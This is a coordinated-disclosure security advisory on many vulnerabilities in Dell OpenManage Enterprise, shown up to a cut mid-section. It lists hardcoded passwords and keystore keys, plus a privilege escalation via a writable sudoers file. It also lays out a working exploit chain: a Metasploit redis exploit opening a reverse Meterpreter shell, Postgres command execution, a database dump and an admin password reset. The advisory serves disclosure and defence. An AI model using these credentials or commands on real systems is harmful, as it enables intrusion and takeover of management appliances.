Dell OpenManage Enterprise Hardcoded Credentails / Privilege Escalation / Deserialization

Dell OpenManage Enterprise versions up to 3.6.1 suffer from multiple hard-coded credential issues, multiple privilege escalation, weak permissions, authentication bypass, and other vulnerabilities.


MD5 | 304cbb560ea8ae6e55b7eb8a3824b652

Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on "Multiple vulnerabilities in Dell OpenManage
Enterprise" is posted here:
https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html


=== text-version of the advisory ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: Multiple vulnerabilities in Dell OpenManage Enterprise
Advisory URL: https://pierrekim.github.io/advisories/2021-dell-openmanage-enterprise-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html
Date published: 2021-07-19
Vendors contacted: Dell
Release mode: Coordinated-Disclosure
CVE: None yet assigned



## Product description

Dell EMC OpenManage Enterprise is an intuitive infrastructure
management console.
OpenManage Enterprise is a system management and monitoring
application that provides
a comprehensive view of the Dell EMC servers, chassis, storage, and
network switches on the enterprise network.

- From https://www.dell.com/support/kbdoc/en-sg/000175879/support-for-openmanage-enterprise:
Secure: Security is a top priority



## Vulnerabilities Summary

Vulnerable versions: all versions up to 3.6.1

The summary of the vulnerabilities is:

1. Hardcoded ActiveMQ credentials
2. Hardcoded ActiveMQ credentials for JMX
3. Hardcoded ActiveMQ keystore
4. Hardcoded JDBC Passwords
5. Hardcoded passwords for core_admin and replicator
6. KeyStore using hardcoded Key
7. Permissive ACL for Postgres
8. Local Privilege Escalation (as postgres) inside postgres docker
9. Remote Auth Bypass with 2 pre-auth RCEs in docker instances
10. Undocumented `system` account
11. Database key stored in the database
12. Weak permission on SSL/TLS Key
13. Multiple Local Privilege Escalations from `mcsimetricssvc` -
partially silently patched in version 3.6.1
14. Multiple Local Privilege Escalations from group `mcsitasksvc`
15. Multiple Local Privilege Escalations from group `tomcat`
16. Local Privilege Escalation from group `omctui`
17. Multiple TOCTOUs in "security_tool.sh" shell script
18. Incorrect access for tomcat
19. Grub password stored in postgres, without authentication for local user
20. Pre-auth and post-auth Java Deserializations - silently patched in
version 3.6.1
21. Idrac User


Miscellaneous notes:

We had forgotten these vulns until we saw some tweets regarding
`dbutil_2_3.sys` and
we reminded we still had unpublished research in Dell products.

This research was done a year ago (in July 2020) against OpenManage 3.4 and
we confirmed all the versions - including the latest version (3.6.1) -
are affected by the vulnerabilities.

When checking openmanage enterprise 3.5, we also found new
vulnerabilities (java stuff, grub, idrac).
When checking openmanage enterprise 3.6.1, it appears some
vulnerabilities were silently patched (java stuff and a LPE).

We also removed some potential vulnerabilities because their exploitations
were not straightforward due to the presence of SELinux.



## Details - Hardcoded ActiveMQ credentials

It is possible to retrieve hardcoded ActiveMQ credentials by reading
the `/opt/apache-activemq-5.*/conf/credentials.properties` file:

[[email protected] /]# cat
/opt/apache-activemq-5.*/conf/credentials.properties
activemq.username=system
activemq.password=manager
guest.password=password

A new file (`credentials-enc.properties`, which was the file
`credentials.properties` in previous version of OpenManage) appeared
in the 3.5 version:

[[email protected] /]# cat
/opt/apache-activemq-5.*/conf/credentials-enc.properties
activemq.username=system
activemq.password=ENC(mYRkg+4Q4hua1kvpCCI2hg==)
guest.password=ENC(Cf3Jf3tM+UrSOoaKU50od5CuBa8rxjoL)

Note: Prior to the 3.5 version, the file `credentials.properties`
contained the identical encrypted credentials, instead of clear-text
credentials:

[[email protected] /]# cat
/opt/apache-activemq-5.10.0/conf/credentials.properties
activemq.username=system
activemq.password=ENC(mYRkg+4Q4hua1kvpCCI2hg==)
guest.password=ENC(Cf3Jf3tM+UrSOoaKU50od5CuBa8rxjoL)

In the latest version, it appears the passwords are now in clear-text.

ActiveMQ listen to all the public interfaces:

[[email protected] /]# ps -auxww|grep -i active
ps -auxww|grep -i active
activem+ 1065 0.9 1.2 4042088 208636 ? Sl 04:37 0:06
/usr/bin/java -Xms256m -Xmx512m
-Dorg.apache.activemq.SERIALIZABLE_PACKAGES=java.lang,javax.security,java.util,org.apache.activemq,org.fusesource.hawtbuf,com.thoughtworks.xstream.mapper,com.dell.enterprise.common.integration.lib.taskengine
-Dcom.sun.management.jmxremote -Djava.awt.headless=true
-Djava.io.tmpdir=/var/lib/activemq/tmp
-Dactivemq.classpath=/opt/apache-activemq-5.16.0//conf:/opt/apache-activemq-5.16.0//../lib/:
-Dactivemq.home=/opt/apache-activemq-5.16.0/
-Dactivemq.base=/opt/apache-activemq-5.16.0/
-Dactivemq.conf=/opt/apache-activemq-5.16.0//conf
-Dactivemq.data=/var/lib/activemq/data -jar
/opt/apache-activemq-5.16.0//bin/activemq.jar start

[[email protected] /]# netstat -laputen|grep 1065
netstat -laputen|grep 1065
tcp6 0 0 :::46403 :::*
LISTEN 1000 27797 1065/java
tcp6 0 0 :::61616 :::*
LISTEN 1000 29817 1065/java

Luckily, the firewall blocks all incoming connections to these 2 ports.

Other credentials found:

[[email protected] /]# cat
/opt/apache-activemq-*/conf/jetty-realm.properties
[...]
# Defines users that can access the web (console, demo, etc.)
# username: password [,rolename ...]
admin: admin, admin
user: user, user

Furthermore, SELinux doesn't allow users to read
`/opt/apache-activemq-5.*/conf/` files - still the passwords are
hardcoded.



## Details - Hardcoded ActiveMQ credentials for JMX

Java Management Extensions (JMX) allows remote debugging of java applications.

These files contain the hardcoded passwords in clear-text for JMX
access to ActiveMQ.
Even if they have wrong permissions, SELinux doesn't allow regular
users to read `/opt/apache-activemq-5.*/conf/` files.
Still the passwords are hardcoded, as shown below:

[[email protected] /]# ls -la /opt/apache-activemq-5.16.0/conf/jmx*
-rwxr-xr-x. 1 root root 965 Sep 25 2020
/opt/apache-activemq-5.16.0/conf/jmx.access
-rwxr-xr-x. 1 root root 964 Sep 25 2020
/opt/apache-activemq-5.16.0/conf/jmx.password

[[email protected] /]# tail -n 1
/opt/apache-activemq-5.16.0/conf/jmx.access
admin readwrite

[[email protected] /]# tail -n 1
/opt/apache-activemq-5.16.0/conf/jmx.password
admin activemq

It is interesting to note that the path of ActiveMQ changes, from old
version to the recent one,
indicating activemq is updated for every new release of Open Manage
Enterprise but the hardcoded credentials are never changed.



## Details - Hardcoded ActiveMQ keystore

We can find several hardcoded keystore files inside
`/opt/apache-activemq-5.16.0/conf`:

[[email protected] conf]# ls -la *ts *ks
-rwxr-xr-x. 1 root root 1370 Sep 25 2020 broker.ks
-rwxr-xr-x. 1 root root 665 Sep 25 2020 broker.ts
-rwxr-xr-x. 1 root root 1357 Sep 25 2020 client.ks
-rwxr-xr-x. 1 root root 665 Sep 25 2020 client.ts
[[email protected] conf]# sha256sum *ts *ks
1c17bb3b5d1335a0821eb5b9c8c1de7331219619416c9d31a6b775e232bf4456 broker.ts
1c17bb3b5d1335a0821eb5b9c8c1de7331219619416c9d31a6b775e232bf4456 client.ts
718d056b1a5518abf2a5ab38d0e81eb6d41c3187d93c7c54817fcb20503b0c8c broker.ks
ce0d36c002d9912dc5f7344353735277d0af15630199ec91e96eef29a5acd3f4 client.ks

The permissions are wrong (644) but SELinux doesn't allow regular
users to read `/opt/apache-activemq-5.*/conf/` files.
Still the files are hardcoded.

Also, the password for the keystore file (`broker.ks`) is defined in
the `jetty.xml` file, with 644 permission:

<property name="keyStorePath" value="${activemq.conf}/broker.ks" />
<property name="keyStorePassword" value="password" />

The hardcoded password for the keystore is `password`.



## Details - Hardcoded JDBC Passwords

The passwords is hardcoded (`Dell123$`) and can't be changed:

[[email protected] /]# cat
/opt/dell/mcsi/webapps/api/WEB-INF/classes/jdbc.properties
hibernate.connection.url=jdbc:postgresql://localhost:5432/enterprisedb
hibernate.connection.username=core_admin
hibernate.connection.password=Dell123$

Wrong permissions but SELinux again blocks any read attempt.

[[email protected] /]# ls -la
/opt/dell/mcsi/webapps/api/WEB-INF/classes/jdbc.properties
-rwxrwxr-x. 1 root root 151 Sep 25 2020
/opt/dell/mcsi/webapps/api/WEB-INF/classes/jdbc.properties

In previous versions (before 3.5), it was also possible to extract the
password from the files
`/opt/dell/mcsi/lib/db/scripts/mcsi/sysconfigdao/TSQL/9000_attribute_registry
- About.txt` and
`/opt/dell/mcsi/lib/db/scripts/mcsi/sysconfigdao/TSQL/9040_default_data_sysconfig_templates
- About.txt`.
These 2 files contained:

[...]
Create a new Data Source using "PostgreSQL Unicode(x64)"

Data Source: LexingtonLocal
Database: enterprisedb
Server: localhost
User Name: core_admin
Password: Dell123$ <---------- password
SSL Mode: disabled
Port: 5432
Driver: PostgreSQL ODBC Driver(UNICODE)

Alter the "Datasource" within Options of the new data source
Bools as Char: OFF
Unknown Sizes: Longest
[...]

There will be a couple errors that are fixed by replacing 'select'
with 'perform' at the line numbers given by the errors.

[...]
declare @serverName nvarchar(256) = N'LEXINGTON';
declare @dataSourceName nvarchar(256) = N'LexingtonLocal';
declare @userName nvarchar(256) = N'core_admin';
declare @password nvarchar(256) = N'Dell123$'; <------ password
[...]


These files don't exist anymore in version 3.5.

Interestingly, `Dell123$` is the provided password in the documentation files:

- From `/opt/dell/omc/webapps/omc/console/omcOnlineHelp/en/GUID-0A8DECB1-C2E7-4904-A071-FEC75D6A54C7.html`:

Must contain at least one character in: uppercase, lowercase,
digit, and special character. For example, Dell123$

The command `grep -ri 'Dell123\$' /opt/` as root will list several
files containing this password.



## Details - Hardcoded passwords for core_admin and replicator

The `/opt/dell/mcsi/lib/db/scripts/mcsi/00_core/01CreateDB/01RoleCreation.sql`
script has wrong permissions and
contains hardcoded clear-text passwords for the creation of roles in postgres:

- - replicator, with password `Password123$`,
- - core_admin, with password `md5292f7d66e18e0128fa11bebb95c467a6` as
`UNENCRYPTED PASSWORD` is being used instead of `ENCRYPTED PASSWORD`.


[[email protected] /]# cat
/opt/dell/mcsi/lib/db/scripts/mcsi/00_core/01CreateDB/01RoleCreation.sql

-- Role: "core_admin"

-- DROP ROLE core_admin;

--CREATE ROLE core_admin LOGIN
-- ENCRYPTED PASSWORD 'md564f6b341503abb8ca26367630f233b22'
-- NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;

-- CREATE ROLE replicator LOGIN
-- ENCRYPTED PASSWORD 'md5a7c4e11df28c56eac643ace589e81d4e'
-- NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE REPLICATION;

CREATE ROLE core_admin LOGIN
UNENCRYPTED PASSWORD 'md5292f7d66e18e0128fa11bebb95c467a6'
SUPERUSER INHERIT NOCREATEDB NOCREATEROLE;

CREATE ROLE replicator LOGIN
UNENCRYPTED PASSWORD 'Password123$'
NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE REPLICATION;



## Details - KeyStore using hardcoded Key

By default, only the passwords for servers/idrac/appliances inside the
postgres database are encrypted using a keystore containing a secret
key.

This keystore file is located in
`/opt/dell/mcsi/appliance/config/security/keystore.p12`.

At first, it seems insecure because its permissions are wrong (664)
but this file is in fact protected by SELinux:

[[email protected] /]# ls -la
/opt/dell/mcsi/appliance/config/security/keystore.p12
-rw-rw-r--+ 1 root root 313 May 16 04:06
/opt/dell/mcsi/appliance/config/security/keystore.p12

SELinux policy:

/opt/dell/mcsi/appliance/config/security/keystore\.p12 -- system_u:object_r:mcsi_appliance_secret_t:s0

Nonetheless, the password of the keystore is hardcoded:

- From `/opt/dell/omc/scripts/runonce/update_keystorepassword_runonce.sh`:

[[email protected] /]# cat
/opt/dell/omc/scripts/runonce/update_keystorepassword_runonce.sh
[...]
/usr/java/latest/bin/keytool -storepasswd -new
"7673D238EBF23E51EC18E9D9B5DAB299" -storepass "changeit" -keystore
/opt/dell/mcsi/appliance/config/security/keystore.p12
[...]
/usr/java/latest/bin/keytool -alias "secretKey" -keypasswd -new
"7673D238EBF23E51EC18E9D9B5DAB299" -keypass "changeit" -storepass
"7673D238EBF23E51EC18E9D9B5DAB299" -keystore
/opt/dell/mcsi/appliance/config/security/keystore.p12

The password `7673D238EBF23E51EC18E9D9B5DAB299` was found in all
versions of OpenManage and it works:

[[email protected] /]# openssl pkcs12 -info -in
/opt/dell/mcsi/appliance/config/security/keystore.p12
Enter Import Password: [7673D238EBF23E51EC18E9D9B5DAB299]
MAC Iteration 100000
MAC verified OK
PKCS7 Data
Warning unsupported bag type: secretBag

We can also find the original password `changeit` for the keystore
inside the `/opt/dell/mcsi/appliance/scripts/ca/importCert.exp`
script:

[[email protected] /]# cat
/opt/dell/mcsi/appliance/scripts/ca/importCert.exp
[...]
spawn /usr/java/latest/bin/keytool -import -alias localhost -file
/etc/pki/tls/certs/localhost.crt -keystore
/usr/java/latest/lib/security/cacerts
match_max 100000
expect -exact "Enter keystore password: "
send -- "changeit\r"
expect -exact "Trust this certificate? \[no\]: "
send -- "yes\r"
sleep 3



## Details - Permissive ACL for Postgres

- From the files `/opt/dell/mcsi/lib/db/data/pg_hba.conf.core` and
`/opt/dell/mcsi/lib/db/data/pg_hba.conf.trust`,
the entire docker IP range (`169.254.255.1/24`) has a full access to
postgres, without password (`trust`)

[[email protected] /]# cat
/opt/dell/mcsi/lib/db/data/pg_hba.conf.trust
# TYPE DATABASE USER CIDR-ADDRESS METHOD

# "local" is for Unix domain socket connections only
local all postgres trust
local replication rep
trust
# IPv4 local connections:
host all postgres 127.0.0.1/32 trust
host all postgres 169.254.255.1/24 trust
host replication rep 169.254.255.1/24
trust

# IPv4 & IPv6 local connections:
host all all 127.0.0.1/32 trust
host all all 169.254.255.1/24 trust

host all all ::1/128 trust
#host replication all 172.18.100.0/16 md5
#hostssl replication all 172.18.100.0/16 md5
host all postgres ::1/128 trust
[[email protected] /]# cat
/opt/dell/mcsi/lib/db/data/pg_hba.conf.core
# TYPE DATABASE USER CIDR-ADDRESS METHOD

# "local" is for Unix domain socket connections only
local postgres postgres trust
host enterprisedb core_admin ::1/128 trust
host enterprisedb core_admin 127.0.0.1/32 trust
host enterprisedb core_admin 169.254.255.1/24 trust
local enterprisedb core_admin trust

local replication rep trust
host replication rep 169.254.255.1/24 trust


In fact, no password is being used by the solution to manage the
database, as shown below:

[[email protected] /]# cat
/var/etc/opt/dell/mcsi/logjdbc.properties
postgresql.connection.url=jdbc:postgresql://localhost:5432/enterprisedb
postgresql.connection.username=core_admin
postgresql.connection.password=

A compromise of a docker instance will likely provide a full access to
the Postgres database (see
"Remote Auth Bypass with 2 pre-auth RCEs in docker instances" for a demo).

Also, it it possible to see that authentication for Posgtres in the
device is mainly based on IP:

[[email protected] /]# cat
/opt/dell/omc/scripts/execute_db_script.sh
#!/usr/bin/env bash

dbHost=localhost
dbUser=core_admin
dbName=enterprisedb
dbPort="5432"
psql_arguments=()
[...]

No authentication is being defined in this shell script.



## Details - Local Privilege Escalation (as postgres) inside postgres docker

By default, some ACLs allow to connect to Postgres without a password.

A local unprivileged user (e.g.: `nobody`) inside the host or inside
any docker instances
running in the appliance will get code execution as `postgres` inside
the postgres docker.
He will also get a full control over the database, so a full control
over the appliance.

It is possible to reach the postgres database on localhost, thanks to
a `docker-proxy` daemon:

[[email protected] /]# ps -auxww|grep proxy | grep 5432
root 1340 0.3 0.0 448608 13184 ? Sl 04:37 0:36
/usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 5432
-container-ip 169.254.255.2 -container-port 5432

It is also possible to reach the postgres database using the IP of the
docker instance:

[[email protected] /]$ psql -d enterprisedb -h
169.254.255.2 -U core_admin -p 5432
psql (11.9, server 11.6)
Type "help" for help.

enterprisedb=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype
| Access privileges
--------------+------------+----------+-------------+-------------+-----------------------
enterprisedb | core_admin | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8
| =c/postgres +
| | | |
| postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8
| =c/postgres +
| | | |
| postgres=CTc/postgres
(4 rows)

enterprisedb=# \q

[[email protected] /]$ psql -d enterprisedb -h
127.0.0.1 -U core_admin -p 5432
psql (11.9, server 11.6)
Type "help" for help.

enterprisedb=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype
| Access privileges
--------------+------------+----------+-------------+-------------+-----------------------
enterprisedb | core_admin | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8
| =c/postgres +
| | | |
| postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8
| =c/postgres +
| | | |
| postgres=CTc/postgres
(4 rows)

enterprisedb=# \q

It is then possible to get code execution inside the postgres docker,
without authentication:

[[email protected] /]$ psql -d enterprisedb -h
127.0.0.1 -U core_admin -p 5432
psql (11.9, server 11.6)
Type "help" for help.

enterprisedb=# DROP TABLE IF EXISTS cmd_exec;
NOTICE: table "cmd_exec" does not exist, skipping
DROP TABLE
enterprisedb=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
enterprisedb=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
enterprisedb=# SELECT * FROM cmd_exec;
cmd_output
--------------------------------------------------------------------
uid=26(postgres) gid=26(postgres) groups=26(postgres),26(postgres)
(1 row)



## Details - Remote Auth Bypass with 2 pre-auth RCEs in docker instances

There is a chain of pre-auth vulnerabilities allowing to:
- - get a shell on the redis container, as `redis`
- - get a shell on the postgres container, as `postgres`
- - get a full access to the postgres database
- - bypass authentication on the web interface as admin

Due to some requirements in the exploit chain, the attacker needs to be
on the same subnet as the target (same LAN, without a gateway between
the target and the attacker).

The attack scenario is:
1. attacker will own the redis running in a container inside the virtual machine
running Dell OpenManage Enterprise and get a shell inside this container
2. attacker will use the shell inside the redis container as a relay
to get access
to the remote postgresql server
3. attacker will get a shell on the postgresql server
4. attacker will redefine a new password for the web interface and will dump
the entire postgresql server
5. attacker will get an access on the web interface as admin

The network flow is:

Attacker(192.168.1.102) -> redis(169.254.255.3, routed by
192.168.1.100) -> Posgres(169.254.255.2)

IPs used in this setup:

- - 192.168.1.100: target virtual machine running Dell OpenManage Enterprise.
- - 192.168.1.102: attacker machine, running Kali.

Internal IPs inside Dell OpenManage Enterprise, by default, already
configued by the solution:

- - 169.254.255.2 is the internal IP of the postgres container running
inside the virtual machine
running Dell OpenManage Enterprise.
- - 169.254.255.3 is the internal IP of the redis container running
inside the virtual machine
running Dell OpenManage Enterprise.

[[email protected] /]# docker ps
CONTAINER ID IMAGE COMMAND
CREATED STATUS PORTS
NAMES
ecf97860f111 redis:latest
"docker-entrypoint.s" 2 hours ago Up 2 hours
127.0.0.1:6379->6379/tcp redis
e1e82315ec5b mcsi/omeproductionimage:2.6.0.43
"docker-entrypoint.s" 2 hours ago Up 2 hours
2345/tcp, 127.0.0.1:5432->5432/tcp primarydatabase

Shell and Metasploit session:

It is required to add a route to the internal IP of the redis container
running inside OpenManage Enterprise:

kali# route add -host 169.254.255.3 gw 192.168.1.100
kali# traceroute -nI 169.254.255.3
traceroute to 169.254.255.3 (169.254.255.3), 30 hops max, 60 byte packets
1 192.168.1.100 0.775 ms 0.762 ms 1.060 ms
2 169.254.255.3 1.911 ms 1.922 ms 1.893 ms

On the 3.6.1 version, pings are now dropped. Using `tcptraceroute`:

kali# tcptraceroute 169.254.255.3 6379
Running:
traceroute -T -O info -p 6379 169.254.255.3
traceroute to 169.254.255.3 (169.254.255.3), 30 hops max, 60 byte packets
1 192.168.1.100 (192.168.1.100) 0.489 ms 0.440 ms 0.545 ms
2 169.254.255.3 (169.254.255.3) <syn,ack> 0.852 ms 0.821 ms 0.720 ms

An attacker can now reach the redis and postgres docker instances
because iptables is not correctly configured and
allow the 2 services to be reachable from the WAN. Also, by default,
IP forwarding is enabled:

[[email protected] /]# sysctl net.ipv4.conf.all.forwarding
net.ipv4.conf.all.forwarding = 1

Why not directly reaching Postgres ?
By default, ACLs defined in Postgres configuration only allow
connections from the `169.254.255.0/24` range,
thus it is required to reach the redis interface available on the
`169.254.255.3` IP and then use redis as a relay to reach the postgres
instance.

local postgres postgres trust
host enterprisedb core_admin ::1/128 trust
host enterprisedb core_admin 127.0.0.1/32 trust
host enterprisedb core_admin 169.254.255.1/24 trust
local enterprisedb core_admin trust

local replication rep trust
host replication rep 169.254.255.1/24 trust

When trying to connect directly to the IP of Postgres, we can see it
is ACL-blocked (after adding a route to `169.254.255.2`):

kali# psql -d enterprisedb -h 169.254.255.2 -U core_admin -p 5432
kali# psql: error: could not connect to server: FATAL: no
pg_hba.conf entry for host "192.168.1.102", user "core_admin",
database "enterprisedb", SSL off

We can test if we can reach directly the redis daemon, running inside
the redis docker:

kali# telnet 169.254.255.3 6379
Trying 169.254.255.3...
Connected to 169.254.255.3.
Escape character is '^]'.
TEST
-ERR unknown command `TEST`, with args beginning with:
config set dir /tmp
+OK
^]q
telnet> q
Connection closed.

We can reach redis, time to get RCE using master/slave replication
using metasploit.

On the attacker machine, it is required to update the
`/usr/share/metasploit-framework/modules/exploits/linux/redis/redis_unauth_exec.rb`
file
to use a writable directory for the user `redis`:

Patch `/usr/share/metasploit-framework/modules/exploits/linux/redis/redis_unauth_exec.rb`
to add:

131a132
> redis_command('CONFIG', 'SET', 'dir', '/tmp')


Metasploit session:

kali# msfconsole
msf5 > use exploit/linux/redis/redis_unauth_exec
msf5 exploit(linux/redis/redis_unauth_exec) > set SRVHOST 192.168.1.102
SRVHOST => 192.168.1.102
msf5 exploit(linux/redis/redis_unauth_exec) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf5 exploit(linux/redis/redis_unauth_exec) > set RHOSTS 169.254.255.3
RHOSTS => 169.254.255.3
msf5 exploit(linux/redis/redis_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] 169.254.255.3:6379 - Compile redis module extension file
[+] 169.254.255.3:6379 - Payload generated successfully!
[*] 169.254.255.3:6379 - Listening on 192.168.1.102:6379
[*] 169.254.255.3:6379 - Rogue server close...
[*] 169.254.255.3:6379 - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.102:4444 ->
192.168.1.100:60572) at 2020-07-11 12:59:57 -0400
[!] 169.254.255.3:6379 - This exploit may require manual
cleanup of './mkmiq.so' on the target

meterpreter > ls
Listing: /tmp
=============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 46808 fil 2020-07-09 08:59:55 -0400 mkmiq.so

meterpreter > shell
Process 19 created.
Channel 1 created.
id
uid=999(redis) gid=999(redis) groups=999(redis)
exit
meterpreter >

Note, with a recent metasploit, the exploit has been moved to
`exploit/linux/redis/redis_replication_cmd_exec`.

The diff is now:

diff /usr/share/metasploit-framework/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
137a138
> redis_command('CONFIG', 'SET', 'DIR', '/tmp')

This works with all openmanage version (up to the latest version - 3.6.1).

After getting a shell as `redis` inside the redis docker, it is time
to add a port forwarding
to the postgresql, in order to bypass ACLs:

meterpreter > portfwd add -l 5432 -p 5432 -r 169.254.255.2
[*] Local TCP relay created: :5432 <-> 169.254.255.2:5432

On another shell, an attacker will get code execution inside the PGSQL
container:

kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
psql (12.1 (Debian 12.1-2), server 11.6)
Type "help" for help.

enterprisedb-# \l
List of databases
Name | Owner | Encoding | Collate | Ctype
| Access privileges
--------------+------------+----------+-------------+-------------+-----------------------
enterprisedb | core_admin | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8
| =c/postgres +
| | | |
| postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8
| =c/postgres +
| | | |
| postgres=CTc/postgres
(4 rows)

enterprisedb=# DROP TABLE IF EXISTS cmd_exec;
DROP TABLE
enterprisedb=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
enterprisedb=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
enterprisedb=# SELECT * FROM cmd_exec;
cmd_output
-------------------------------------------------------
uid=26(postgres) gid=26(postgres) groups=26(postgres)
(1 row)

enterprisedb=#


Dump of database:

kali# pg_dump -d enterprisedb -h 127.0.0.1 -U core_admin > dump.sql

Time to redefine the administrator password:

Passwords are located in `encryptedstring` table:

kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
enterprisedb=# SELECT * FROM encryptedstring;
3 | $2a$10$.hbHnOt6crprUoAO2PMJxerc8nQ12SJ.jxgM8JgZiuLIfkCVNgSqe
4 | system
1 | $2a$10$bzBdUKXFdlb0U7Hl.w6XIuQFKQQr0Qgi165KN2TaaOemlaAe.OuU2
2 | admin

Change admin password into `x`:

kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
enterprisedb=# UPDATE encryptedstring SET
encrypteddata='$2a$10$XXXXXXXXXXXXXXXXXXXXXOQhTG4aUZ8kSMBOnpMruh17xTsANIaT6'
WHERE id=1;
UPDATE 1
enterprisedb=#

Now, use `admin` / `x` on the web interface ( http://192.168.1.100/ ).

After reversing some java code, passwords are blowfish 10 rounds:

kali# python3
Python 3.7.5 (default, Oct 27 2019, 15:43:29)
[GCC 9.2.1 20191022] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import bcrypt
>>> passwd = b'x'
>>> salt = b'$2a$10$XXXXXXXXXXXXXXXXXXXXXXXXX' # or
bcrypt.gensalt(rounds=10)
>>> hashed = bcrypt.hashpw(passwd, salt)
>>> print(hashed)
b'$2a$10$XXXXXXXXXXXXXXXXXXXXXOQhTG4aUZ8kSMBOnpMruh17xTsANIaT6'
>>>

The main takeways in this setup are:

- - Incorrect iptables firewall for Postgres and Redis - only the main
IP of the appliance is
correctly firewalled, docker instances have these 2 ports open
- - IP forwarding is enabled
- - Lack of authentication for Redis,
- - Lack of authentication for Postgres, only based on IP with an
errror when defining the netmask:
`169.254.255.1/24` is being used instead of `169.254.255.1/32` or
`169.254.255.0/24`
- - Incorrect ACL for Postgres
- - SELinux is useless in this case because all actions are legit
- - Custom 'encryption' everywhere to waste time



## Details - Undocumented `system` account

There is likely an undocumented system account in all openmanage
versions, as shown below:

We can list the users from the postgres database:

enterprisedb=# select * from user_entity;
id | user_type_id | directory_server_id | user_name |
description | pwcredential_id | email | isenabled | locked |
enable_smart_card | ca_certificate | user_certificate |
default_account | object_guid | object_sid | id_owner
-------+--------------+---------------------+-----------+-------------+-----------------+-------+-----------+--------+-------------------+----------------+------------------+-----------------+-------------+------------+---------
10066 | 1 | | admin | admin
| 1 | | t | f | f |
10068 | 1 | | system | system
| 2 | | t | f | f |

enterprisedb=# select * from passwordcredential;
id | dtype | label | usernameid |
passwordid | domainid | updatedate
----+--------------------------------+--------+------------+------------+----------+----------------------------
2 | HashedPasswordCredentialEntity | system | 4 |
3 | | 2020-07-11 18:08:50.207+00
1 | HashedPasswordCredentialEntity | admin | 2 |
1 | | 2020-07-11 18:14:41.012+00
(2 rows)

kali# psql -d enterprisedb -h 127.0.0.1 -U core_admin -p 5432
enterprisedb=# SELECT * FROM encryptedstring;
id | encrypteddata
----+--------------------------------------------------------------
3 | $2a$10$.hbHnOt6crprUoAO2PMJxerc8nQ12SJ.jxgM8JgZiuLIfkCVNgSqe
4 | system
2 | admin
1 | $2a$10$XXXXXXXXXXXXXXXXXXXXXOQhTG4aUZ8kSMBOnpMruh17xTsANIaT6

Also from dump.sql:

COPY core.passwordcredential (id, dtype, label, usernameid,
passwordid, domainid, updatedate) FROM stdin;
2 HashedPasswordCredentialEntity system 4 3 \N
2020-07-11 11:24:42.386+00
1 HashedPasswordCredentialEntity admin 2 1 \N
2020-07-11 11:26:14.551+00
\.

When trying to add a `system` account:

[please use the HTML version at
https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html]

This account doesn't seem to be documented but we were unable to use
it to login into the web service.

Its aim is currently not known.



## Details - Database key stored in the database

The application database key (`DatabaseKey`) is generated randomly
during the installation and is stored inside the database.
It is possible to extract it without authentication:

COPY core.encryptionkey (id, dtype, bytes) FROM stdin;
1 DatabaseKey
DHAqjsvpfUh+aRZKLTa6+K+rmHBtcPafoyuIMPTqV3hTUbGTb08ZzZSkF4GYgbPQ
\.



## Details - Weak permissions on SSL/TLS Key

The TLS key has weak permissions:

[[email protected] /]# ls -la /etc/pki/tls/private/localhost.key
-rw-r--r--. 1 root root 3272 Jul 11 2020 /etc/pki/tls/private/localhost.key

No SELinux protection - this allows any user to read the files.



## Details - Multiple Local Privilege Escalations from `mcsimetricssvc`

The file `/etc/sudoers.d/94_mcsi_metrics` belongs to `mcsimetricssvc`,
as shown below:

[[email protected] etc]# ls -la /etc/sudoers.d/94_mcsi_metrics
-rw-rw-r--. 1 mcsimetricssvc root 847 Sep 25 2020
/etc/sudoers.d/94_mcsi_metrics

This user can just edit this file to get root access using `sudo`.

It is also possible to directly find this weakness by executing
`sudo`, a warning message will appear:

[[email protected] ~]# sudo id
sudo: /etc/sudoers.d/94_mcsi_metrics is owned by uid 1005, should be 0
uid=0(root) gid=0(root) groups=0(root)

This LPE was silently patched in version 3.6.1.

Futhermore, this user has these (large) sudo privileges:

%mcsimetricssvc ALL=NOPASSWD:/usr/bin/mount, /usr/bin/cp,
/usr/bin/umount,
